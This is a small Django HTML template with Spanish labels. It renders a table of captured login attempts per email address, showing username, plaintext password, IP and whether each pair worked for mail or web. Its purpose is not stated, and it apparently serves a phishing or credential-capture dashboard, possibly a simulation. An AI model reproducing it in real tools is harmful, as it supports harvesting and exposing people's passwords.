{% load static %}
<table id="credenciales">

    <tr>
        <th> </th>
        <th><h6>Usuario</h6></th>
        <th><h6>Contraseña</h6></th>
        <th><h6>Ip</h6></th>
        <th><h6>Estado mail</h6></th>
        <th><h6>Estado web</h6></th>
    </tr>
    {% for x in credenciales %}
        {% if x.correo.correo == i.correo %}
            <tr>
                <td>Intento {{ forloop.counter }}</td>
                <td>{{ x.usuario }}</td>
                <td>{{ x.contraseña }}</td>
                <td>{{ x.ip }}</td>
                <td>    
                    {% if x.mail_status == True  %} 
                        <img src="{% static 'images/frontend/correos/accept.png' %}" width="20px">
                    {% else %}
                        <img src="{% static 'images/frontend/correos/close.png' %}" width="20px">
                    {% endif %}
                </td>
                <td>
                    {% if x.web_status == True  %} 
                        <img src="{% static 'images/frontend/correos/accept.png' %}" width="20px">
                    {% else %}
                        <img src="{% static 'images/frontend/correos/close.png' %}" width="20px">
                    {% endif %}
                </td>
            </tr>
        {% endif %}
    
    {% endfor %}



</table>